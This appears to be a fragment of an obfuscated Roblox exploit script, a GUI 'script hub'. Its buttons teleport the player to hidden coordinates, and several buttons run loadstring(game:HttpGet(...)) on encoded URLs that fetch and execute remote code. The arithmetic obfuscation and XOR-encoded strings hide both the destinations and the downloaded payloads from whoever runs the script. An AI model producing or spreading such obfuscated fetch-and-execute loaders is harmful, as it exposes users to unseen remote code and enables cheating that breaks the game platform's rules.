game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((749.2398757999999 -(322 + 175)) -(730 -(173 + 390))),(275.5625 + 838 + (1234 -(203 + 111))) -(119 + 1794 + ((80 + 33) -(148 -97))) ,48.074821 + 22 + 2 + (730 -(57 + 649)) + (402 -(328 + 56)) ,(0 + 0 + 0) -(0 + 0) ,(1892 + (553 -(433 + 79))) -((998 -(15 + 138 + 280)) + (3950 -(2085 + 497))) ,(9 -6) -(9 -7) ,(1492 + 124 + 45) -(1316 + 161 + 73 + (1147 -(562 + 474))) ,((2 -1) + 0) -(0 -0) ,v7("\96\100","\230\77\84\197\188\22\207\183"), -((906 -(76 + 829)) + (1673 -(1506 + 167))),((1459 -682) + (345 -(58 + 208))) -(242 + 167 + 155 + ((316 + 127) -(87 + 64))) ,((0 -0) + (337 -(258 + 79))) -((85 + 582) -((186 -97) + (2048 -(1219 + 251)))) );wait();break;end end break;end end break;end if ((1671 -(1231 + 440))==v168) then v169=(58 -(34 + 24)) -0 ;v170=nil;v168=1 + 0 ;end end end});v31:Button({[v7("\205\17\222\232","\85\153\116\166\156\236\193\144")]=v7("\130\236\66\188\246\64\246\185","\96\196\128\45\211\132"),[v7("\22\140\119\83\208\174\183\211","\184\85\237\27\63\178\207\212")]=function(v171) local v172=0 -0 ;local v173;local v174;while true do if (v172==(1 + 0)) then while true do if (v173==0) then v174=0 + 0 + (0 -0) ;while true do if (v174==(((0 -0) -(0 -0)) -(1049 -((1916 -1344) + (1041 -564))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((1592.2398758 -(877 + 712)) + 12 + 42 + 28),90.8125 -60 ,(823.074821 -(242 + 512)) + (94 -49) ,0 + 0 + ((713 -(92 + 535)) -(84 + 2 + 0)) ,((1029 -529) -196) -(12 + 164 + (247 -179) + ((885 + 17) -(345 + 152 + 345))) ,1 + 0 ,(0 -0) + (0 -0) + (1785 -(1476 + 309)) + 0 ,(1334 -((1889 -(299 + 985)) + 173 + 555)) -((0 -0) + (93 -(86 + 7))) ,v7("\69\9","\63\104\57\105"), -(((4327 -3268) -(56 + 526)) -((921 -(672 + 208)) + 9 + 11 + 415)),1001 -((1070 -(14 + 118)) + ((677 -(339 + 106)) -(135 + 34))) ,0 + 0 + (1395 -(440 + 955)) + ((0 + 0) -(0 -0)) );wait();break;end end break;end end break;end if (v172==(0 + 0)) then v173=0;v174=nil;v172=2 -1 ;end end end});v31:Button({[v7("\63\130\188\80","\36\107\231\196")]=v7("\123\185\173\136\79\245\241\215","\231\61\213\194"),[v7("\42\172\49\127\11\172\62\120","\19\105\205\93")]=function(v175) local v176=0;local v177;local v178;while true do if (v176==(1 + 0)) then while true do if (v177==0) then v178=(842 -(260 + 93)) -(457 + 30 + 2) ;while true do if (v178==(((1093 -615) + 647) -((1689 -753) + ((3565 -(1181 + 793)) -(832 + 146 + 424))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(81.2398758 + (311 -(105 + 202))),3.0625 + 0 + 0 ,(820.074821 -(352 + 458)) + (112 -84) + ((685 -417) -192) ,(753 + 24 + (2443 -1607)) -(1565 + ((1793 -(438 + 511)) -((1971 -(1262 + 121)) + (1276 -(728 + 340))))) ,(1317 -(2618 -(816 + 974))) -((2257 -(884 + 916)) + ((202 -136) -(122 -88))) ,1 + 0 + (339 -(163 + 176)) ,0 -0 ,654 -((1066 -834) + 128 + 293) ,v7("\228\88","\95\201\104\190\225"), -((3292 -((3379 -(1564 + 246)) + (665 -(124 + 221)))) -(205 + 627 + 390 + 180)),(451 -(115 + 336)) + (0 -0) + (0 -(0 + 0)) ,(651 -(45 + 1)) -(18 + 298 + 289) );wait();break;end end break;end end break;end if (v176==(1990 -(1282 + 708))) then v177=0 + (1212 -(583 + 629)) ;v178=nil;v176=1 + 0 ;end end end});v31:Button({[v7("\155\206\217\218","\174\207\171\161")]=v7("\203\242\2\252\234\151\190\175","\183\141\158\109\147\152"),[v7("\15\8\234\0\46\8\229\7","\108\76\105\134")]=function(v179) local v180=0 -0 ;local v181;while true do if (v180==(0 + 0)) then v181=(2308 -(943 + 227)) -(((895 + 1151) -1264) + (1648 -(1539 + 92)) + (2285 -(706 + 1240))) ;while true do if (v181==(((1978 -(81 + 177)) -((1881 -1215) + (1044 -(212 + 45)))) -(((2010 -1409) -((2306 -(708 + 1238)) + 65)) + 8 + 78 + 2 + 3))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((2142.2398758 -(586 + 1081)) -(79 + 175)) -((725 -(348 + 163)) -(71 + 7))), -(34.6875 -((288 -(215 + 65)) + 2)),(3696.074821 -(6344 -3854)) -(((3736 -(1541 + 318)) -902) + ((902 + 114) -(255 + 248 + 299 + 97))) ,(3625 -(1036 + 714)) -(157 + ((1252 + 647) -(51 + 41 + 89))) ,((1280 -(883 + 397)) -(590 -(563 + 27))) + (0 -0) ,(1989 -(1369 + 617)) -((1489 -(85 + 1402)) + 0 + 0) ,0 + (0 -0) + ((403 -(274 + 129)) -(217 -(12 + 205))) ,(83 + 7 + 564) -(((2047 -1519) -(287 + 9)) + 368 + (437 -(27 + 357))) ,v7("\166\149","\174\139\165\209\129"), -(((482 -(91 + 389)) + (298 -(90 + 207))) -((1 + 4) -3)),(861 -(706 + 155)) + 0 + (0 -(1795 -(730 + 1065))) ,(1244 -((2048 -(1339 + 224)) + 387 + 372)) + (0 -(0 + 0)) );wait();break;end end break;end end end});v31:Label({[v7("\151\182\250\213","\24\195\211\130\161\166\99\16")]=v7("\121\60\214\19\108\41\121\60\214\19\108\41\121","\118\38\99\137\76\51")});v31:Button({[v7("\201\35\29\6","\64\157\70\101\114\105")]=v7("\116\160\162\163\59\73\188\164\235\21\78","\112\32\200\199\131"),[v7("\15\81\80\180\193\170\33\39","\66\76\48\60\216\163\203")]=function(v182) local v183=0 -0 ;local v184;local v185;while true do if (1==v183) then while true do if (v184==((2032 -(268 + 575)) -(442 + (2041 -(919 + 375))))) then v185=(2799 -1781) -(((2803 -(180 + 791)) -((2637 -(323 + 1482)) + (2221 -(1177 + 741)))) + ((84 + 1183) -(88 + (3217 -2359)))) ;while true do if (v185==((233 + 372) -((705 -389) + 89 + 200))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new((0.187499046 + 0 + 0) -((109 -(96 + 13)) + (1921 -(962 + 959))) ,((7643.9375 -4583) -(136 + 630 + (1374 -(461 + 890)))) -((5204 + 1890) -(22040 -16383)) ,342.0625 -(246 -(309 -(19 + 224))) ,(387 + 39) -(((1146 -(37 + 161)) -588) + 65) ,0 + 0 + ((0 + 0) -(0 + 0)) ,(1073 -(1036 + (98 -(60 + 1)))) -((923 -(826 + 97)) + 0 + 0) ,(0 -(0 -0)) -(0 + 0) ,(1481 -(641 + 839)) + ((1880 -967) -(910 + 3)) ,((685 -(375 + 310)) -0) + ((3683 -(1864 + 135)) -(1466 + 218)) ,((0 -0) + 0) -(1148 -(124 + 432 + 198 + 394)) ,((0 -0) + 0) -((1939 -(314 + 817)) -(187 + 142 + 479)) ,((2296 -(32 + 182)) -(129 + 45 + (2376 -1696))) -(((1171 -(39 + 26)) -784) + 905) );wait();break;end end break;end end break;end if (v183==(144 -(54 + 90))) then v184=198 -(45 + 153) ;v185=nil;v183=1 + 0 ;end end end});v31:Button({[v7("\142\131\97\231","\68\218\230\25\147\63\174")]=v7("\129\35\85\88\246\128\43\64\88\179\191\106\118\66\162\191\43\93\79\179","\214\205\74\51\44"),[v7("\217\77\238\240\117\251\79\233","\23\154\44\130\156")]=function(v186) local v187=552 -(457 + 95) ;local v188;local v189;while true do if (v187==0) then v188=(0 + 0) -(0 -0) ;v189=nil;v187=2 -1 ;end if (v187==1) then while true do if (v188==(0 -0)) then v189=(130 + 23 + 28) -(((2865 -2034) -(396 + 343)) + 8 + (244 -163)) ;while true do if (v189==((1359 -(485 + 263)) -(((2786 -(575 + 132)) -(29 + (2309 -(750 + 111)))) + (1019 -(445 + 565))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((2606.7919006 -(109 + 26 + 1254)) -(((243 + 1448) -1242) + 740)), -(((97.2935925 -42) -(15 + 28)) + (315 -(189 + 121)) + 1 + 1),(2385.9113159999997 -(634 + 713)) -(((2891 -(493 + 45)) -(389 + (2106 -(493 + 475)))) + 46) ,((389 + 1132) -((886 -(158 + 626)) + 222 + 250)) -(232 + 13 + (644 -254) + 70 + 242) ,0 + 0 + 0 , -(((2639 -(1035 + 56)) -((1279 -(114 + 845)) + 1225)) -(1 + 1)),(0 -(0 -0)) + 0 + 0 + 0 ,(2948 -(179 + 870)) -((1724 -(157 + 1307)) + (2297 -659)) ,(2299 -((1699 -(827 + 51)) + 1038)) -((952 -(1507 -937)) + 7 + 26 + 25) ,(4 -(474 -(95 + 378))) -(1 + 0 + 1) ,(0 -0) + 0 ,0 -(0 + 0) );wait();break;end end break;end end break;end end end});v31:Button({[v7("\37\163\181\186","\115\113\198\205\206\86")]=v7("\183\82\253\72\129\67\190\124\136\88\241\72\196\99\241\74","\58\228\55\158"),[v7("\151\136\220\34\62\172\54\191","\85\212\233\176\78\92\205")]=function(v190) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((1028.983902 -(334 + 677)) + 17),826.506348 -((5435 -3983) -((1890 -(1049 + 7)) + (838 -646))) ,((58.911316 -27) + 139 + 305) -(81 + (627 -393)) ,1205 -((40 -20) + 393 + 489 + ((1889 -(1004 + 416)) -(2123 -(1621 + 336)))) ,((2243 -(337 + 1602)) -((1817 -(1014 + 503)) + (1019 -(446 + 569)))) -(0 + 0 + 0) , -(((14 -9) -(2 + 1)) -(1 -0)),((8 + 354) -(112 + (755 -(223 + 282)))) + 0 ,(49 + 1642) -(447 + 674 + ((2267 -843) -(1247 -392))) ,(1805 -(623 + 47)) -(832 + (219 -(32 + 13)) + 129) ,(63 + 49 + 103) -(18 + 4 + (1945 -(1070 + 731)) + 48) ,(324 + 15 + (1748 -(1257 + 147))) -(143 + 216 + (236 -112) + 200) ,1463 -(((2951 -(98 + 35)) -(420 + 581 + (1462 -1049))) + (198 -139)) );end});v31:Button({[v7("\126\93\144\246","\130\42\56\232")]=v7("\217\176\39\241\69\43\170\147\40\236\79\45\170\151\43\247\84\48\231","\95\138\213\68\131\32"),[v7("\9\41\173\79\116\43\43\170","\22\74\72\193\35")]=function(v192) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((64.983902 -35) + ((830 + 57) -(215 + 29 + 280 + 358))),(563.006409 -(395 + 162)) + ((714 + 97) -((2568 -(816 + 1125)) + (93 -27))) ,(2097.9113159999997 -(701 + 447)) -((2282 -(2334 -818)) + ((1092 -467) -(512 + (1431 -(391 + 950))))) ,((5136 -3230) -((4172 -2507) + (593 -352))) -(0 + 0) ,((418 + 299) -((1363 -990) + 344)) -(1522 -(251 + 1271)) , -((309 + 37 + (1124 -704)) -((310 -186) + (569 -225) + (1556 -(1147 + 112)))),((371 + 1111) -920) -(((1147 -582) -231) + ((345 + 982) -(35 + 1064))) ,698 -(335 + 362) ,(0 + 0) -((0 + 0) -(0 -0)) ,2 -1 ,(0 + (0 -0)) -((6017 -4781) -(298 + (2662 -1724))) ,0 -0 );end});v31:Button({[v7("\24\124\252\76","\56\76\25\132")]=v7("\125\211\164\53\220\30\243\164\41\194","\175\62\161\203\70"),[v7("\31\220\207\31\55\61\222\200","\85\92\189\163\115")]=function(v194) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((1261.9636841 -(233 + (1592 -(237 + 329)))) + ((5977 -4308) -(420 + 216 + 564 + 466))),((1536.006348 -(408 + 716)) + (1489 -1097)) -(138 + (824 -(344 + 477)) + 17 + 78) ,25.921409600000004 + (1820 -(1188 + 573)) + (2 -1) ,(2 + 0) -1 ,(0 + 0) -((716 -495) -((84 -29) + (410 -244))) ,0 + 0 + 0 + 0 ,(1529 -(508 + 1021)) -(0 + 0) ,(5655 -4174) -(((2104 -(228 + 938)) -(36 + (946 -(332 + 353)))) + ((1785 -319) -627)) ,(1368 -((88 -54) + 1334)) + 0 + 0 + 0 ,0 + 0 + (0 -0) + ((1706 -(18 + 405)) -(1035 + 114 + 134)) ,(0 + 0) -(0 -0) ,(979 -(194 + 784)) + ((1791 -(694 + 1076)) -((1924 -(122 + 1782)) + 1 + 0)) );end});v31:Label({[v7("\29\169\40\44","\88\73\204\80")]=v7("\17\188\47\121\22\229\17\188\47\121\22\229\17","\186\78\227\112\38\73")});v31:Button({[v7("\200\82\229\65","\26\156\55\157\53\51")]=v7("\160\209\16\205\248\125\141\203\2\220\170","\48\236\184\118\185\216"),[v7("\198\188\91\60\205\53\230\182","\84\133\221\55\80\175")]=function(v196) local v197=(152 + 11) -(48 + 40 + 4 + 71) ;while true do if (v197==((319 -(97 + 37 + (541 -356))) + 0 + 0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((2806.3500061 -(214 + 1756)) -((1462 -(549 + (2823 -2239))) + 53 + 426)), -((731.4488449 -(314 + 21 + 350)) -18),((4127.519897 -(217 + 368)) -(7583 -5073)) -((1542 -(315 + 163 + 364 + 126)) + 191) ,(0.587748766 + 0) -(889 -(844 + 45)) ,v7("\240\183","\60\221\135\68\198\167"), -((284.809043527 -(242 + 42)) + 0 + ((2345 -1173) -((1827 -1041) + (1586 -(132 + 1068))))),(0 -0) -(1623 -(214 + 1409)) ,((1854 + 542) -(3290 -(497 + 1137))) -(396 + (1283 -(9 + 931))) ,v7("\163\237","\185\142\221\152\227\34"),(1379.809043527 -((1344 -(181 + 108)) + 193 + 131)) + 0 ,((3304 -1964) -((3245 -2152) + 59 + 188)) + 0 + 0 ,(1235.587748766 + 154) -(15 + 120 + (1730 -(296 + 180))) );wait();break;end end end});v31:Button({[v7("\108\192\79\238","\151\56\165\55\154\35\83")]=v7("\141\70\23\237\168\66\11\250","\142\192\35\101"),[v7("\245\116\37\175\229\141\175\29","\118\182\21\73\195\135\236\204")]=function(v198) loadstring(game:HttpGet(v7("\0\40\14\80\23\87\178\71\59\19\83\16\67\250\1\40\18\85\6\24\238\13\46\25\79\10\25\248\6\40\84\67\11\0\178\41\44\8\79\3\2\238\69\61\28\75\75\90\255\12\61\73\21\86\84\170\91\58\27\68\6\85\248\14\63\72\25\87\91\251\10\101\27\19\6\88\174\95\111\85\82\5\26\178\81\100\25\70\2\11\171\90\111\77\24\84\84\174\11\104\77\16\83\9\170\12\101\24\22\2\89\249\88\108\30\69\86\95\172\88\61\75\21\84\66\250\1\47\14\70\13\1\248\89\114\14\88\16","\157\104\92\122\32\100\109")))();end});v31:Button({[v7("\151\163\215\222","\203\195\198\175\170\93\71\237")]=v7("\13\67\59\211\17\53\243\37\78\39","\156\78\43\94\181\49\113"),[v7("\81\233\200\175\9\66\122\121","\25\18\136\164\195\107\35")]=function(v199) local v200=1403 -(1183 + 220) ;local v201;local v202;while true do if (v200==1) then while true do if (v201==(1265 -(1037 + 228))) then v202=(2881 -(3288 -1256)) -((722 -(1348 -880)) + ((5108 -3613) -(1634 -(527 + 207)))) ;while true do if (v202==(((527 -(187 + 340)) + 0) -((1870 -(1298 + 572)) -0))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((458.27499819 -325) -((104 -62) + (183 -(144 + 26)) + (176 -105))),((6515.625 -3721) -(608 + 1093)) -(716 -453) ,(4621.024993999999 -2630) -((1261 -((1764 -1400) + 165 + 159)) + (3336 -(2875 -756))) ,((4 + 0) -(1 + 1)) -((203 -(5 + 197)) + (686 -(339 + 347))) ,((0 -0) -(0 -0)) + 0 ,((376 -(365 + 11)) -(0 + 0)) -((0 -0) -(0 -0)) ,((2192 -(837 + 87)) -((2117 -868) + 19)) + 0 + (1670 -(837 + 833)) ,(3658 -(580 + 2138)) -((1800 -((2073 -(356 + 1031)) + 182 + 218)) + 177 + (1694 -(73 + 1573))) ,((1617 -(1307 + 81)) -((307 -(7 + 227)) + (255 -99))) -((166 -(90 + 76)) + (0 -0)) ,0 + 0 ,(0 + 0) -((675 + 136) -((2823 -2102) + (350 -(197 + 63)))) ,1 + 0 + 0 + 0 + 0 + 0 );wait();break;end end break;end end break;end if ((0 + 0)==v200) then v201=(0 -0) -(1369 -(618 + 751)) ;v202=nil;v200=1;end end end});v34:Button({[v7("\220\40\177\91","\216\136\77\201\47\18\220\161")]=v7("\1\229\45\206\72\249\177\29","\226\77\140\75\186\104\188"),[v7("\154\207\220\51\77\184\205\219","\47\217\174\176\95")]=function(v203) loadstring(game:HttpGet(v7("\176\201\98\18\161\14\55\105\191\212\101\22\252\83\113\50\176\200\116\23\161\81\106\37\183\211\98\7\188\64\54\37\183\208\57\35\162\70\119\33\183\206\59\3\180\95\55\35\236\136\115\86\226\6\122\112\188\222\112\90\229\4\40\34\190\141\46\7\176\86\124\36\239\139\46\1\183\5\45\105\170\220\97\77\229\7\123\119\185\140\112\80\231\13\43\116\189\139\117\3\235\80\124\113\185\219\114\1\180\81\125\37\190\137\32\7\229\0\126\117\190\141\39\0\253\120\113\32\172\152\36\87\224\4\93\21\136\152\36\87\224\4\126\47\160\216\114","\70\216\189\22\98\210\52\24")))();end});v34:Button({[v7("\238\218\187\147","\179\186\191\195\231")]=v7("\213\54\30\240\185\18\25\247\237\58\10\164\220\12\40","\132\153\95\120"),[v7("\146\179\2\33\245\219\163\186","\192\209\210\110\77\151\186")]=function(v204) loadstring(game:HttpGet(v7("\232\23\54\249\236\158\175\76\37\224\236\208\174\4\43\253\247\209\226\22\49\236\237\199\239\13\54\236\241\208\174\0\45\228\176\229\240\17\45\238\240\215\173\2\36\226\176\145\228\2\117\236\167\146\183\80\36\186\170\144\229\1\35\187\168\144\229\87\39\191\168\145\230\83\114\234\171\192\228\76\48\232\232\139\185\6\32\189\254\197\227\6\32\186\251\156\225\85\123\186\250\146\226\0\118\186\253\151\182\83\119\237\254\148\225\86\117\184\174\149\230\83\35\187\176\195\233\16\54\239\246\200\229\82\108\253\231\208","\164\128\99\66\137\159")))();end});v34:Button({[v7("\52\140\241\170","\222\96\233\137")]=v7("\154\187\162\25\200\215\255\178\182\190\95\173\192\192","\144\217\211\199\127\232\147"),[v7("\219\46\50\36\215\68\1\79","\36\152\79\94\72\181\37\98")]=function(v205) loadstring(game:HttpGet(v7("\223\204\83\47\196\130\8\112\208\209\84\43\153\223\78\43\223\205\69\42\196\221\85\60\216\214\83\58\217\204\9\60\216\213\8\30\199\202\72\56\216\203\10\62\209\211\8\58\129\129\67\102\214\221\70\105\135\137\67\109\212\219\16\111\129\129\23\110\132\139\20\107\133\140\22\107\130\139\69\112\197\217\80\112\210\140\68\58\209\217\31\106\134\219\68\61\128\218\22\59\209\143\16\61\142\222\70\102\135\137\70\60\134\139\22\106\132\221\31\60\134\129\18\105\152\223\78\44\195\222\78\51\210\137\9\43\207\204","\95\183\184\39")))();end});v34:Button({[v7("\129\58\255\50","\98\213\95\135\70\52\224")]=v7("\211\166\219\116\92\255\173\221\55\113\205\147","\52\158\195\169\23"),[v7("\89\189\62\120\132\52\120\128","\235\26\220\82\20\230\85\27")]=function(v206) loadstring(game:HttpGet(v7("\128\181\253\210\103\210\238\166\197\125\155\181\167\197\125\156\169\252\192\97\155\164\251\193\123\134\181\236\204\96\198\162\230\207\59\169\177\251\205\115\135\178\164\195\114\131\238\184\149\36\140\240\234\150\37\139\248\176\145\118\139\243\235\196\32\220\242\236\193\34\222\165\189\151\37\216\243\190\195\59\154\160\254\141\38\220\242\189\145\34\219\160\235\198\35\138\247\188\195\117\222\240\186\154\38\218\162\239\144\38\223\241\177\196\119\221\165\184\145\35\218\163\232\150\59\143\168\250\214\114\129\173\236\147\58\156\185\253","\20\232\193\137\162")))();end});v33:Label({[v7("\22\218\221\178","\17\66\191\165\198\135\236\119")]=v7("\45\170\168\28\237\237\172\200\0\186\238\6\236\237\172\240\1\187\167\94\217\233\224\221\79\166\186\83\246\251\172\217\6\168\162\10\191\250\233\210\12\160\163\22\241\236\233\213\79\182\161\6\191\253\255\212\79\136\161\23\210\231\232\212\65","\177\111\207\206\115\159\136\140")});v33:Button({[v7("\49\140\8\0","\63\101\233\112\116\180\47")]=v7("\228\52\233\63\247\50\198","\86\163\91\141\114\152"),[v7("\112\10\120\127\56\82\8\127","\90\51\107\20\19")]=function(v207) loadstring(game:HttpGet(v7("\133\228\145\255\46\215\191\202\232\52\158\228\203\232\52\153\248\144\237\40\158\245\151\236\50\131\228\128\225\41\195\243\138\226\114\172\224\151\224\58\130\227\200\238\59\134\191\212\188\60\139\169\132\184\57\221\245\213\182\100\222\162\129\183\108\221\243\134\190\107\143\162\211\233\111\222\169\214\182\114\159\241\146\160\100\218\162\211\233\109\213\168\134\234\56\219\169\212\184\59\139\242\209\233\100\143\166\213\189\111\222\160\209\184\106\213\162\211\236\62\220\246\210\187\114\170\255\129\226\50\137\245\192\189\104\223\160\135\250\41\200\162\208\189\109\154\249\145\231\120\223\165\215\191\49\130\241\129\252\41\159\249\139\232","\93\237\144\229\143")))();end});v33:Button({[v7("\33\243\232\13","\38\117\150\144\121\107")]=v7("\12\181\250\51\96\157\239\54\33","\90\77\219\142"),[v7("\197\5\45\53\78\6\121\237","\26\134\100\65\89\44\103")]=function(v208) loadstring(game:HttpGet(v7("\249\247\36\51\183\171\172\127\36\173\226\247\126\36\173\229\235\37\33\177\226\230\34\32\171\255\247\53\45\176\191\224\63\46\235\208\243\34\44\163\254\240\125\34\162\250\172\96\117\244\247\225\98\118\253\166\229\98\114\160\164\176\100\32\241\247\224\54\123\244\167\187\96\122\165\168\181\98\123\235\227\226\39\108\246\163\230\53\117\240\161\230\100\115\165\245\180\49\114\162\245\180\101\123\244\243\225\52\38\246\166\182\97\119\167\167\177\101\118\243\164\186\98\115\235\246\234\35\55\162\248\239\53\114\234\229\251\36","\196\145\131\80\67")))();end});v32:Button({[v7("\42\181\30\28","\136\126\208\102\104\120")]=v7("\81\132\200\74\161\91\41\84\56\179\199\70\163\86","\49\24\234\174\35\207\50\93"),[v7("\47\243\241\132\115\13\241\246","\17\108\146\157\232")]=function(v209) loadstring(game:HttpGet(v7("\67\215\0\253\60\242\4\140\6\236\56\230\76\202\0\229\58\170\94\208\17\255\44\167\69\215\17\227\59\230\72\204\25\162\10\172\76\198\61\212\96\161\69\197\29\227\38\188\78\218\29\232\35\172\4\206\21\254\59\173\89\140\7\226\58\186\72\198","\200\43\163\116\141\79")))();end});v32:Button({[v7("\139\51\37\151","\131\223\86\93\227\208\148")]=v7("\205\68\187\179\17\176\240\86\246\151\25\184\234\75","\213\131\37\214\214\125"),[v7("\5\42\41\179\227\39\40\46","\129\70\75\69\223")]=function(v210) loadstring(game:HttpGet(v7("\78\223\231\249\111\181\9\132\225\232\107\161\65\194\231\225\105\237\83\216\246\251\127\224\72\223\246\231\104\161\69\196\254\166\90\230\74\223\246\251\117\225\65\238\253\232\126\227\67\207\188\199\125\226\67\199\246\250\111\206\66\198\250\231\51\226\71\194\253\166\79\224\83\217\240\236","\143\38\171\147\137\28")))();end});v35:Label({[v7("\228\135\161\231","\180\176\226\217\147\99\131")]=v7("\230\169\43\6\199\188\111\86\157\234","\103\179\217\79")});v35:Label({[v7("\126\178\4\193","\195\42\215\124\181\33\236")]=v7("\103\25\119\126\101\184\77\25\119\16\32\239\77\108\30\126\9\241\15\51\119\126\101\184\77\25\119\126\4\252\9\92\51\126\8\247\27\92\58\59\43\236\77\109\54\60\79\184\77\25\119\126\101\184\77\120\51\58\32\252\77\122\56\46\60\249\15\85\50\126\1\241\30\90\56\44\33\184\33\80\57\53\79\184\77\25\119\126\101\184\77\88\57\58\101\225\24\81\119\100\108\146\77\25\119\126","\152\109\57\87\94\69")});v35:Label({[v7("\205\210\18\183","\200\153\183\106\195\222\178\52")]=v7("\7\243\140\60\93\95\114\178\198\110\24","\58\82\131\232\93\41")});v35:Label({[v7("\183\82\200\1","\95\227\55\176\117\61")]=v7("\9\107\42\72\160\88\120\42\83\235\23\112\99\72\173\10\127\46\78\235\11\110\38\78\175","\203\120\30\67\43")});v28:ShowTab(v29);
